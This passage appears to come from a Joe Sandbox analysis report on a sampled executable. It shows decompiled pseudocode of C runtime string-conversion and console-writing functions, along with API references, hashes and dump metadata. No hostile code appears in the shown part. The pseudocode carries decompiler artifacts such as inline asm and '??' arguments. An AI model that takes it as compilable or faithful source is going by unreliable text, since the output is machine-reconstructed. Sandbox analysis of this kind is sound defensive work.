										}
									} else {
										asm("sbb eax, eax");
										E00ABBFA0();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E00AB46B0(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00ABBFA0();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00AB6333(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00AB6F6B(_t130);
													}
												}
											}
										}
									}
								}
								E00AB6F6B(_t100);
							}
						}
					}
				}
				L63:
				return E00AB29BB(_v8 ^ _t132);
			}






































        0x00ab9296
        0x00ab929d
        0x00ab92a5
        0x00ab92a8
        0x00ab92ae
        0x00ab92b1
        0x00ab92b4
        0x00ab92b8
        0x00ab92bb
        0x00ab92c0
        0x00ab92e7
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab92c2
        0x00ab92ca
        0x00ab92cc
        0x00ab92d0
        0x00ab92d0
        0x00ab92d5
        0x00ab92f3
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab92d7
        0x00ab92e0
        0x00ab92f5
        0x00ab92f5
        0x00ab92fa
        0x00ab9301
        0x00ab9304
        0x00ab9304
        0x00ab9309
        0x00ab9315
        0x00ab9322
        0x00ab932f
        0x00ab9342
        0x00000000
        0x00ab9344
        0x00ab9346
        0x00ab9379
        0x00000000
        0x00ab937b
        0x00ab937d
        0x00ab9381
        0x00ab9387
        0x00ab938a
        0x00ab938c
        0x00ab938f
        0x00ab938f
        0x00ab9394
        0x00000000
        0x00000000
        0x00ab9396
        0x00ab939a
        0x00ab93a4
        0x00ab93a9
        0x00000000
        0x00ab93ab
        0x00000000
        0x00ab93ab
        0x00ab93a9
        0x00000000
        0x00ab939a
        0x00ab938f
        0x00ab938a
        0x00000000
        0x00ab9381
        0x00ab9348
        0x00ab934a
        0x00ab934e
        0x00ab9354
        0x00ab9357
        0x00ab9359
        0x00ab9359
        0x00ab935e
        0x00000000
        0x00000000
        0x00ab9360
        0x00ab9364
        0x00ab936e
        0x00ab9373
        0x00000000
        0x00ab9375
        0x00000000
        0x00ab9375
        0x00ab9373
        0x00000000
        0x00ab9364
        0x00ab9359
        0x00ab9357
        0x00000000
        0x00ab934e
        0x00ab9346
        0x00ab9331
        0x00ab9331
        0x00ab9331
        0x00000000
        0x00ab9331
        0x00ab9324
        0x00ab9324
        0x00ab9326
        0x00ab9317
        0x00ab9317
        0x00ab9319
        0x00ab9319
        0x00ab93b0
        0x00ab93b0
        0x00ab93b0
        0x00ab93bd
        0x00ab93c3
        0x00ab93c8
        0x00ab92e9
        0x00ab93ce
        0x00ab93ce
        0x00ab93d6
        0x00ab93da
        0x00ab9435
        0x00ab9437
        0x00000000
        0x00ab93dc
        0x00ab93e1
        0x00ab93e3
        0x00ab93e5
        0x00ab93ed
        0x00ab9411
        0x00ab9416
        0x00ab941b
        0x00ab9421
        0x00000000
        0x00ab9427
        0x00ab9427
        0x00000000
        0x00ab9427
        0x00ab93ef
        0x00ab93f1
        0x00ab93f5
        0x00ab93fa
        0x00ab93fc
        0x00ab9401
        0x00ab9516
        0x00ab9516
        0x00ab9407
        0x00ab9407
        0x00ab942d
        0x00ab942d
        0x00ab9430
        0x00ab943a
        0x00ab943c
        0x00000000
        0x00ab9442
        0x00ab944a
        0x00ab9458
        0x00000000
        0x00ab945e
        0x00ab9467
        0x00ab946d
        0x00ab9472
        0x00000000
        0x00ab9478
        0x00ab9478
        0x00ab947b
        0x00ab9480
        0x00ab9484
        0x00ab94d0
        0x00000000
        0x00ab9486
        0x00ab948b
        0x00ab948d
        0x00ab948f
        0x00ab9497
        0x00ab94b4
        0x00ab94be
        0x00ab94c0
        0x00ab94c3
        0x00000000
        0x00ab94c5
        0x00ab94c5
        0x00000000
        0x00ab94c5
        0x00ab9499
        0x00ab949b
        0x00ab949f
        0x00ab94a4
        0x00ab94a8
        0x00ab950a
        0x00ab950a
        0x00ab94aa
        0x00ab94aa
        0x00ab94cb
        0x00ab94cb
        0x00ab94d2
        0x00ab94d4
        0x00000000
        0x00ab94ed
        0x00ab94ed
        0x00ab9506
        0x00ab9506
        0x00ab94d4
        0x00ab94a8
        0x00ab9497
        0x00ab950e
        0x00ab9513
        0x00ab9472
        0x00ab9458
        0x00ab943c
        0x00ab9401
        0x00ab93ed
        0x00ab951a
        0x00ab9520
        0x00ab93c8
        0x00ab9309
        0x00ab92d5
        0x00ab9522
        0x00ab9535

        APIs
        • GetCPInfo.KERNEL32(00D6ED00,00D6ED00,?,7FFFFFFF,?,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?,00D6ED00), ref: 00AB933A
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000009,00D6ED00,00D6ED00,00000000,00000000,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB93BD
        • __alloca_probe_16.LIBCMT ref: 00AB93F5
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000001,00D6ED00,00D6ED00,00000000,00AB9567,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB9450
        • __alloca_probe_16.LIBCMT ref: 00AB949F
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000009,00D6ED00,00D6ED00,00000000,00000000,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB9467
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        • MultiByteToWideChar.KERNEL32(00D6ED00,00000001,00D6ED00,00D6ED00,00000000,00D6ED00,?,00AB9567,00D6ED00,00D6ED00,?,00D6ED00,?,?,?,?), ref: 00AB94E3
        • __freea.LIBCMT ref: 00AB950E
        • __freea.LIBCMT ref: 00AB951A
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
        • String ID: ]iL
        • API String ID: 201697637-4085116960
        • Opcode ID: 19fc53a6d0f502e714717bc35737a6539c30a0825055e71e76ac0dcc84fcb44a
        • Instruction ID: bde736908034529200627370a0500d310a3187072938e517bfbd422551347666
        • Opcode Fuzzy Hash: 19fc53a6d0f502e714717bc35737a6539c30a0825055e71e76ac0dcc84fcb44a
        • Instruction Fuzzy Hash: C991A171E00216ABDB258FA5C885AEF7BFDAF09710F184259EA05EB283D735DC45CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB8853 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMON
        Download Yara Rule
        C-Code - Quality: 69%
        			E00AB8853(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xac3018; // 0x4c695d09
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00AB914F(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00AB29BB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00AB6F6B(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00AB6564(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00AB6F6B(_t101);
									goto L36;
								}
								_t62 = E00AB6564(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00AB6F6B(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00AB46B0(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00ABBFA0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00AB6564(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00AB46B0(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00ABBFA0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























        0x00ab8858
        0x00ab8859
        0x00ab885a
        0x00ab8861
        0x00ab8865
        0x00ab8866
        0x00ab886c
        0x00ab8872
        0x00ab8878
        0x00ab887b
        0x00ab887b
        0x00ab887e
        0x00ab8880
        0x00ab8880
        0x00ab887e
        0x00ab8882
        0x00ab8887
        0x00ab888e
        0x00ab8891
        0x00ab8891
        0x00ab88ad
        0x00ab88b3
        0x00ab88b8
        0x00ab8a4b
        0x00ab8a5e
        0x00ab88be
        0x00ab88be
        0x00ab88c1
        0x00ab88c6
        0x00ab88ca
        0x00ab891e
        0x00ab891e
        0x00ab8920
        0x00ab8922
        0x00ab8a40
        0x00ab8a40
        0x00ab8a42
        0x00ab8a43
        0x00000000
        0x00ab8a49
        0x00ab8933
        0x00ab8939
        0x00ab893b
        0x00000000
        0x00000000
        0x00ab8941
        0x00ab8953
        0x00ab8958
        0x00ab895c
        0x00000000
        0x00000000
        0x00ab8969
        0x00ab89a3
        0x00ab89a6
        0x00ab89a9
        0x00ab89ab
        0x00ab89ad
        0x00ab89af
        0x00ab89fb
        0x00ab89fb
        0x00ab89fd
        0x00ab89fd
        0x00ab89ff
        0x00ab8a39
        0x00ab8a3a
        0x00000000
        0x00ab8a3f
        0x00ab8a13
        0x00ab8a18
        0x00ab8a1a
        0x00000000
        0x00000000
        0x00ab8a1e
        0x00ab8a1f
        0x00ab8a20
        0x00ab8a23
        0x00ab8a5f
        0x00ab8a62
        0x00ab8a25
        0x00ab8a25
        0x00ab8a26
        0x00ab8a26
        0x00ab8a33
        0x00ab8a35
        0x00ab8a37
        0x00ab8a68
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab8a37
        0x00ab89b1
        0x00ab89b4
        0x00ab89b6
        0x00ab89b8
        0x00ab89ba
        0x00ab89bd
        0x00ab89c2
        0x00ab89dd
        0x00ab89df
        0x00ab89e9
        0x00ab89eb
        0x00ab89ec
        0x00ab89ee
        0x00000000
        0x00000000
        0x00ab89f0
        0x00ab89f6
        0x00ab89f6
        0x00000000
        0x00ab89f6
        0x00ab89c4
        0x00ab89c6
        0x00ab89ca
        0x00ab89cf
        0x00ab89d1
        0x00ab89d3
        0x00000000
        0x00000000
        0x00ab89d5
        0x00000000
        0x00ab89d5
        0x00ab896b
        0x00ab8970
        0x00000000
        0x00000000
        0x00ab8976
        0x00ab8978
        0x00000000
        0x00000000
        0x00ab898f
        0x00ab8994
        0x00ab8998
        0x00000000
        0x00000000
        0x00000000
        0x00ab899e
        0x00ab88d1
        0x00ab88d3
        0x00ab88d5
        0x00ab88dd
        0x00ab88fc
        0x00ab88fe
        0x00ab8908
        0x00ab890a
        0x00ab890b
        0x00ab890d
        0x00000000
        0x00000000
        0x00ab8913
        0x00ab8919
        0x00ab8919
        0x00000000
        0x00ab8919
        0x00ab88e1
        0x00ab88e5
        0x00ab88ea
        0x00ab88ee
        0x00000000
        0x00000000
        0x00ab88f4
        0x00000000
        0x00ab88f4

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00AB5C57,00000000,?,?,?,00AB8AA4,?,?,00000100), ref: 00AB88AD
        • __alloca_probe_16.LIBCMT ref: 00AB88E5
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AB8AA4,?,?,00000100,5EFC4D8B,?,?), ref: 00AB8933
        • __alloca_probe_16.LIBCMT ref: 00AB89CA
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AB8A2D
        • __freea.LIBCMT ref: 00AB8A3A
          • Part of subcall function 00AB46B0: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00AB8CDE,?,00000000,?,00AB7370,?,00000004,00000000,?,?,?,00AB437B), ref: 00AB46E2
        • __freea.LIBCMT ref: 00AB8A43
        • __freea.LIBCMT ref: 00AB8A68
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
        • String ID: ]iL
        • API String ID: 3864826663-4085116960
        • Opcode ID: 9a4f6ce10222ee5c9348d91d957ecc4af210eae6873f0526a63f4cefb66e2d9b
        • Instruction ID: 90cc9d086417752cca285015a1420d043982fc9b2066483c8e7693a3766a40c9
        • Opcode Fuzzy Hash: 9a4f6ce10222ee5c9348d91d957ecc4af210eae6873f0526a63f4cefb66e2d9b
        • Instruction Fuzzy Hash: 4251D172610216ABDF258F68DC81EFB77ADEB44B90F19422AF805D6142EF38DC40D690
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB96AD Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E00AB96AD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xac3018; // 0x4c695d09
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xac3f60 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xac3f60 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00AB6BA1(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xac3f60 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xac3f60 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xac3f60 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00AB7F6A( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00AB7F6A();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00AB29BB(_v8 ^ _t136);
			}


































        0x00ab96b5
        0x00ab96bc
        0x00ab96bf
        0x00ab96c7
        0x00ab96cb
        0x00ab96d7
        0x00ab96da
        0x00ab96dd
        0x00ab96e4
        0x00ab96ec
        0x00ab96ef
        0x00ab96f5
        0x00ab96fb
        0x00ab9700
        0x00ab9702
        0x00ab9705
        0x00ab970a
        0x00ab9714
        0x00ab971b
        0x00ab971e
        0x00ab9725
        0x00ab972c
        0x00ab9758
        0x00ab977e
        0x00ab9780
        0x00000000
        0x00ab975a
        0x00ab975d
        0x00ab9824
        0x00ab9830
        0x00ab983b
        0x00ab9840
        0x00ab9763
        0x00ab976a
        0x00ab976f
        0x00ab9775
        0x00ab977b
        0x00000000
        0x00ab977b
        0x00ab9775
        0x00ab975d
        0x00ab972e
        0x00ab9732
        0x00ab9735
        0x00ab973b
        0x00ab973d
        0x00ab9740
        0x00ab9744
        0x00ab9781
        0x00ab9784
        0x00ab9785
        0x00ab978a
        0x00ab9790
        0x00ab9796
        0x00ab97a5
        0x00ab97ab
        0x00ab97b1
        0x00ab97b6
        0x00ab97d2
        0x00ab9845
        0x00ab984b
        0x00ab97d4
        0x00ab97dc
        0x00ab97e5
        0x00ab97eb
        0x00000000
        0x00ab97ed
        0x00ab97ef
        0x00ab97f2
        0x00ab980b
        0x00000000
        0x00ab980d
        0x00ab9811
        0x00ab9813
        0x00ab9816
        0x00000000
        0x00ab9816
        0x00ab9811
        0x00ab980b
        0x00ab97eb
        0x00ab97e5
        0x00ab97d2
        0x00ab97b6
        0x00ab9790
        0x00000000
        0x00ab9819
        0x00ab9819
        0x00ab984d
        0x00ab985f

        APIs
        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AB9E22,?,00000000,?,00000000,00000000), ref: 00AB96EF
        • __fassign.LIBCMT ref: 00AB976A
        • __fassign.LIBCMT ref: 00AB9785
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AB97AB
        • WriteFile.KERNEL32(?,?,00000000,00AB9E22,00000000,?,?,?,?,?,?,?,?,?,00AB9E22,?), ref: 00AB97CA
        • WriteFile.KERNEL32(?,?,00000001,00AB9E22,00000000,?,?,?,?,?,?,?,?,?,00AB9E22,?), ref: 00AB9803
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID: ]iL
        • API String ID: 1324828854-4085116960
        • Opcode ID: 032ad9d89667bbec35f61f843c55e6bdb9585941bdecb35c29c1937912b38e99
        • Instruction ID: ff9e750598735ab538c20d7302039bacfa5b5fd34d9be379155d6637dd5a32e2
        • Opcode Fuzzy Hash: 032ad9d89667bbec35f61f843c55e6bdb9585941bdecb35c29c1937912b38e99
        • Instruction Fuzzy Hash: A8518375D00249DFDB10CFE8D885AEEBBF9EF09310F14455AEA56E7252E730A941CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB6E4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON
        Download Yara Rule
        C-Code - Quality: 81%
        			E00AB6E4E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xac3018; // 0x4c695d09
				_v8 = _t34 ^ _t70;
				E00AB47F8(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00AB29BB(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00AB2CE0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00AB6F6B(_t69);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00AB46B0(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00ABBFA0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















        0x00ab6e56
        0x00ab6e5d
        0x00ab6e69
        0x00ab6e6e
        0x00ab6e73
        0x00ab6e78
        0x00ab6e7b
        0x00ab6e7d
        0x00ab6e7d
        0x00ab6e82
        0x00ab6e9b
        0x00ab6ea1
        0x00ab6ea6
        0x00ab6f45
        0x00ab6f49
        0x00ab6f4e
        0x00ab6f4e
        0x00ab6f6a
        0x00ab6f6a
        0x00ab6eac
        0x00ab6eaf
        0x00ab6eb4
        0x00ab6eb8
        0x00ab6f04
        0x00ab6f06
        0x00ab6f08
        0x00ab6f0d
        0x00ab6f24
        0x00ab6f2c
        0x00ab6f3c
        0x00ab6f3c
        0x00ab6f2c
        0x00ab6f3e
        0x00ab6f3f
        0x00000000
        0x00ab6f44
        0x00ab6eba
        0x00ab6ebf
        0x00ab6ec1
        0x00ab6ec3
        0x00ab6ec3
        0x00ab6ecb
        0x00ab6ee8
        0x00ab6ef2
        0x00ab6ef7
        0x00000000
        0x00000000
        0x00ab6ef9
        0x00ab6eff
        0x00ab6eff
        0x00000000
        0x00ab6eff
        0x00ab6ecf
        0x00ab6ed3
        0x00ab6ed8
        0x00ab6edc
        0x00000000
        0x00000000
        0x00ab6ede
        0x00000000

        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00AB5C57,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 00AB6E9B
